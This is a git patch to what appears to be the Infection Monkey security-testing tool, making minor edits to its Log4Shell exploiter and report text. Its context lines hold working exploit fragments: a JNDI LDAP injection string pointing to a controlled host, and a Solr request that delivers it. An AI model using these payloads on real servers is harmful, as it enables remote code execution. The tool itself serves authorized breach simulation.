From 51bf553fb5c1873782ec016273825d44319c3f12 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Mon, 17 Jan 2022 16:37:03 +0100
Subject: [PATCH] Agent, Island: Minor changes to Log4Shell

Return types, removing logging from solr service
and change Log4j to Log4Shell in Island reporting
---
 monkey/infection_monkey/exploit/log4shell.py              | 4 ++--
 .../exploit/log4shell_utils/service_exploiters/solr.py    | 2 --
 .../exploit_processing/exploiter_descriptor_enum.py       | 2 +-
 .../report-components/security/issues/Log4ShellIssue.js   | 8 ++++----
 4 files changed, 7 insertions(+), 9 deletions(-)

diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index 80a3cbb6e..d33b7d0bd 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
 
         self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
 
-    def _build_ldap_payload(self):
+    def _build_ldap_payload(self) -> str:
         interface_ip = get_interface_to_target(self.host.ip_addr)
         return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
 
     # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
-    def _build_command(self, path, http_path):
+    def _build_command(self, path, http_path) -> str:
         # Build command to execute
         monkey_cmd = build_monkey_commandline(
             self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
index 7bdc3fb42..930c6092c 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
@@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
     def trigger_exploit(payload: str, host: VictimHost, port: int):
         url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
         try:
-            logger.debug("Sending malicious SOLR log4j request")
             requests.post(url, timeout=5, verify=False)  # noqa DUO123
-            logger.debug("Request sent")
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index bb63e3cb9..2bce985d5 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
     POWERSHELL = ExploiterDescriptor(
         "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
     )
-    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
+    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
 
     @staticmethod
     def get_by_class_name(class_name: str) -> ExploiterDescriptor:
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
index e9642d71e..4c1bffb39 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js
@@ -2,19 +2,19 @@ import React from 'react';
 import CollapsibleWellComponent from '../CollapsibleWell';
 
 export function log4shellIssueOverview() {
-  return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
+  return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
 }
 
 export function log4shellIssueReport(issue) {
   return (
       <>
-        Upgrade the log4j component to version 2.15.0 or later.
+        Upgrade the Apache Log4j component to version 2.15.0 or later.
         <CollapsibleWellComponent>
           The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
           className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
-          className="badge badge-danger">log4shell remote code execution</span> attack.
+          className="badge badge-danger">the Log4Shell remote code execution</span> attack.
           <br/>
-          The attack was made possible due to an old version of log4j component.
+          The attack was made possible due to an old version of Apache Log4j component.
         </CollapsibleWellComponent>
       </>
     );